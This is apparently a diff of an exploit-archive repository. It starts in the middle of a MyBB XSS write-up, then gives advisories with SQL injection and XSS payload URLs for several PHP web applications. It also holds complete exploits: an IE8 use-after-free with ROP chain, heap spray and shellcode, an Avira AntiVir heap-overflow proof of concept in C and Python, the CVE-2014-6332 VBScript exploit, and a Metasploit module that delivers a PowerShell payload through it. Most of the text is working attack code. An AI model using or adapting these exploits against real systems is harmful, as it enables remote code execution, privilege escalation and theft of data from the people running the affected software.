<td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td>
</tr>
</table>
<br />
c) Reflected XSS - Templates (AP)
Vuln:
GET 'title' - title"><script>alert(666)</script>
localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1
Request:
GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1
Host: localhost
Response:
HTTP/1.1 200 OK
(...)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/1">
<title>Editing Template: calendar"><script>alert(666)</script></title>
d) Reflected XSS - Languages (AP)
Vuln:
GET 'file' - <a onmouseover=alert(666)>woot
localhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=<a onmouseover=alert(666)>woot
Request:
GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1
Host: localhost
Response:
HTTP/1.1 200 OK
(...)
<a href="index.php?module=config-languages">Languages</a> » <a href="index.php?module=config-languages&action=edit&lang=english">English (American)</a> » <span class="active"><a onmouseover=alert(666)>woot</span>
(...)
<div class="title"><a onmouseover=alert(666)>woot</div>

15
platforms/php/webapps/35227.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/45812/info
Alguest is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Alguest 1.1c-patched is vulnerable; other versions may also be affected.
The following example POST request is available:
POST /alguest/elimina.php HTTP/1.0
Host: website
Cookie: admin=1
Content-Length: N
send=elimina&elimina=[SQL Injection]

10
platforms/php/webapps/35228.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/45819/info
CompactCMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied script code may be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
CompactCMS 1.4.1 is vulnerable; other versions may also be affected.
http://www.example.com/afdrukken.php?page=">[XSS]
http://www.example.com/admin/includes/modules/permissions/permissions.Manage.php?status=notice&msg=[XSS]

9
platforms/php/webapps/35231.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45827/info
Advanced Webhost Billing System (AWBS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AWBS 2.9.2 is vulnerable; other versions may also be affected.
http://www.example.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='

149
platforms/windows/remote/35213.html
View file

@ -1,149 +0,0 @@
<!--
Exploit Title: MS14-035 Use-after-free Exploit for IE8
Date: 10 Nov 2014
Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy
Tested on: IE8 with Java6 on Windows7
-->
<html>
<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>
<body>
<!--
<APPLET id="dummy" code="dummy.class" width=100 height=100>
You need to install Java to view this page.
</APPLET>
-->
<div id="mydiv">x</div>
<form id="frm"></form>
<div id="sprayfrm"></div>
<script type="text/javascript">
spraysize = 5000;
sprayelement = document.getElementById("sprayfrm");
sprayelement.style.cssText = "display:none";
var data;
offset = 0x506;
buffer = unescape("%u2020%u2020");
pivot = unescape("%u8b05%u7c34"); // stack pivot
// MSVCR71
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010
// calc
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163");
/*
_______0x1cc_____
| |
\|/ |
Junk ROP Shellcode Pivot Junk
2 3 1
*/
while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
buffer += rop;
buffer += shellcode;
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
while (buffer.length < 0x1000) buffer += buffer;
data = buffer.substring(0,offset) + pivot + rop + shellcode
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);
//obj.style.fontFamily = data.substring(0,0x40000-0x58);
sprayelement.appendChild(obj);
}
block = unescape( // Literal string to avoid heap allocation
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");
blocks = new Array();
for (i = 0; i < spraysize; i++) { // spray 1
blocks.push(document.createElement("button"));
blocks[i].setAttribute("title",block.substring(0, block.length));
sprayelement.appendChild(blocks[i]);
}
for (i = spraysize/2; i < spraysize; i++) { // free some blocks
blocks[i].setAttribute("title","");
}
var newdiv = document.createElement('div');
newdiv.innerHTML = "<textarea id='CTextArea'>&lt;/textarea&gt;";
document.getElementById("frm").appendChild(newdiv);
var newdiv2 = document.createElement('div');
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
document.getElementById("frm").appendChild(newdiv2);
document.getElementById("CInput").checked = true;
trigger = true;
document.getElementById("frm").reset();
function crash() {
if (trigger) {
document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
CollectGarbage();
for (i = spraysize/2; i < spraysize; i++) { // spray 2
blocks[i].setAttribute("title",block.substring(0, block.length));
}
}
}
</script>
</body>
</html>

32
platforms/windows/remote/35225.c Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/45807/info
Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.
Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.
Please note that these issues affect versions of the application that are no longer supported.
#include <windows.h>
int main(int argc, char* argv[])
{
char buffer[0x100];
DWORD returned;
HANDLE hDevice;
hDevice = CreateFileW( L"\\\\.\\avgntdd", GENERIC_READ | GENERIC_WRITE, 0, 0, 3, 0x80, 0 );
if( hDevice != INVALID_HANDLE_VALUE )
{
printf("Could not open handle to guard driver.\n");
return 1;
}
memset( buffer, 0, sizeof(buffer) );
if( !DeviceIoControl( hDevice, 0x0CABA020C, &buffer, sizeof(buffer), 0,0, &returned, 0) )
{
printf("Could not communicate with guard driver.\n");
return 1;
}
return 0;
}

121
platforms/windows/remote/35226.py Executable file
View file

@ -0,0 +1,121 @@
source: http://www.securityfocus.com/bid/45807/info
Avira AntiVir Personal is prone to multiple code-execution vulnerabilities.
Successful exploits may allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will likely result in denial-of-service conditions.
Please note that these issues affect versions of the application that are no longer supported.
#
# Avira AntiVir personal edition avguard.exe 7.00.00.52 local heap overflow
# Proof of Concept (PoC) exploit / target: WinXP SP1
# bug discovered/exploit written by D.Elser
#
# by sending two simple TCP packets which will
# exploit a vulnerability in the Antivir guard
# service, the user will gain SYSTEM privileges
#
# this PoC code will cause the avguard service
# to show a messagebox within an infinite loop
from socket import *
import sys
# the first packet which is sent must
# contain a magic ID at offset 0x18
# and the length of the second packet
# to receive
#
# offset 0x18 : magic ID
# offset 0x1C : length of buffer for second packet
cpacket = "\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00" \
"\x00\x00\x31\x06" \
"\x00\x00\x00\x40"
lyrics = "\x42\x72\x65\x61\x6B\x62\x65\x61\x74\x20\x45\x72\x61\x20\x2D\x20" \
"\x42\x75\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x0D\x0A\x0D\x0A\x45" \
"\x6C\x65\x63\x74\x72\x69\x66\x79\x20\x6D\x65\x20\x79\x6F\x75\x20" \
"\x6D\x79\x20\x68\x61\x6C\x66\x20\x62\x61\x6B\x65\x64\x20\x79\x6F" \
"\x75\x74\x68\x0D\x0A\x49\x20\x6D\x65\x6D\x6F\x72\x69\x73\x65\x20" \
"\x79\x6F\x75\x72\x20\x66\x61\x63\x65\x20\x73\x6F\x20\x49\x20\x77" \
"\x6F\x6E\x27\x74\x20\x66\x6F\x72\x67\x65\x74\x20\x79\x6F\x75\x0D" \
"\x0A\x44\x61\x6E\x63\x69\x6E\x67\x20\x64\x65\x6D\x6F\x6E\x73\x20" \
"\x69\x6E\x20\x74\x68\x65\x20\x66\x69\x72\x65\x6C\x69\x67\x68\x74" \
"\x20\x79\x65\x73\x20\x69\x74\x27\x73\x20\x74\x72\x75\x65\x0D\x0A" \
"\x52\x65\x6D\x69\x6E\x64\x20\x6D\x65\x20\x6F\x66\x20\x74\x68\x65" \
"\x20\x6E\x69\x67\x68\x74\x20\x49\x20\x66\x69\x72\x73\x74\x20\x6D" \
"\x65\x74\x20\x79\x6F\x75\x0D\x0A\x43\x72\x69\x74\x69\x63\x69\x73" \
"\x65\x20\x6D\x65\x20\x66\x6F\x72\x20\x6D\x79\x20\x6D\x69\x73\x2D" \
"\x73\x70\x65\x6E\x74\x20\x79\x6F\x75\x74\x68\x0D\x0A\x4E\x6F\x20" \
"\x74\x68\x72\x69\x6C\x6C\x20\x6E\x6F\x20\x6C\x69\x65\x20\x6D\x6F" \
"\x72\x65\x20\x63\x72\x61\x7A\x79\x20\x74\x68\x61\x6E\x20\x74\x68" \
"\x65\x20\x74\x72\x75\x74\x68\x0D\x0A\x59\x6F\x75\x20\x67\x69\x76" \
"\x65\x20\x6D\x65\x20\x70\x72\x65\x63\x69\x6F\x75\x73\x20\x74\x68" \
"\x69\x6E\x67\x73\x20\x49\x20\x74\x68\x72\x6F\x77\x20\x74\x68\x65" \
"\x6D\x20\x61\x6C\x6C\x20\x61\x77\x61\x79\x0D\x0A\x41\x6E\x64\x20" \
"\x6E\x6F\x77\x20\x79\x6F\x75\x20\x66\x72\x65\x65\x20\x6D\x79\x20" \
"\x62\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x72\x20\x73\x63\x61\x72" \
"\x65\x64\x20\x77\x68\x61\x74\x20\x49\x20\x6D\x69\x67\x68\x74\x20" \
"\x73\x61\x79\x0D\x0A\x0D\x0A\x53\x70\x65\x61\x6B\x20\x6E\x6F\x20" \
"\x6C\x69\x65\x2C\x20\x49\x20\x74\x65\x6C\x6C\x20\x74\x68\x65\x20" \
"\x74\x72\x75\x74\x68\x0D\x0A\x53\x61\x76\x65\x20\x6D\x79\x20\x62" \
"\x72\x65\x61\x74\x68\x20\x79\x6F\x75\x20\x62\x72\x65\x61\x6B\x20" \
"\x74\x68\x65\x20\x72\x75\x6C\x65\x73\x0D\x0A\x54\x69\x6D\x65\x20" \
"\x77\x69\x6C\x6C\x20\x74\x65\x6C\x6C\x20\x79\x65\x61\x68\x20\x77" \
"\x68\x6F\x20\x69\x73\x20\x77\x68\x6F\x0D\x0A\x53\x69\x64\x65\x20" \
"\x62\x79\x20\x73\x69\x64\x65\x20\x77\x65\x27\x72\x65\x20\x62\x75" \
"\x6C\x6C\x69\x74\x70\x72\x6F\x6F\x66\x00"
# main part of shellcode
shellcode = "\x90\x8d\x46\x1b" \
"\x50\x05\x04\x00" \
"\x00\x00\x50\x05" \
"\x19\x00\x00\x00" \
"\x50\xb8\x2f\x71" \
"\x42\x00\xff\xd0" \
"\x90\xeb\xe5\x10" \
"\x20\x01\x00" \
"I got SYSTEM privileges!\x00" + lyrics
# fill shellcode up to a specific length
for i in range(0, 0x4000 - 0x20 - len(shellcode)):
shellcode = shellcode + "\x40"
# second part of shellcode which contains
# the pointers to be overwritten and code
# which jumps to main part of our shellcode
shellcode = shellcode + "\xEB\x0E\x90\x90" \
"\x90\x90\x90\x90" \
"\x52\xBF\x04\x78" \
"\xB4\x73\xED\x77" \
"\x8B\x57\x6C\x8B" \
"\xF2\x81\xEE\xE0" \
"\x3F\x00\x00\xFF" \
"\xE6\x90\x90\x90" \
"\x90\x90\x90\x90" \
"\x90\x90\x90\x90" \
s = socket(AF_INET,SOCK_STREAM)
s.settimeout(1)
s.connect(("127.0.0.1",18350))
print "Avira Antivir avguard.exe 7.00.00.52 local heap overflow.\n" \
"Exploit compatible with XP SP1.\n"
print "Sending control packet (size: 0x%x)" % (len(cpacket))
s.sendall(cpacket)
print "Sending shellcode packet (size: 0x%x)" % (len(shellcode))
s.sendall(shellcode)
print "avguard response:"
print s.recv(1024)
sys.exit()

211
platforms/windows/remote/35229.html Executable file
View file

@ -0,0 +1,211 @@
//*
allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
cve-2014-6332 exploit
https://twitter.com/yuange75
http://hi.baidu.com/yuange1975
*//
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
</body>
</html>

443
platforms/windows/remote/35230.rb Executable file
View file

@ -0,0 +1,443 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "Windows OLE Automation Array Remote Code Execution",
'Description' => %q{
This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.
Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'IBM', # Discovery
'yuange <twitter.com/yuange75>', # PoC
'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit
'Wesley Neelen <security[at]forsec.nl>' #Metasploit
],
'References' =>
[
[ 'CVE', '2014-6332' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => "none"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "November 12 2014",
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
payl.slice! "powershell.exe "
html = <<-EOS
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function trigger()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i)
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=readmemo(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
trigger()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
</body>
</html>
EOS
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end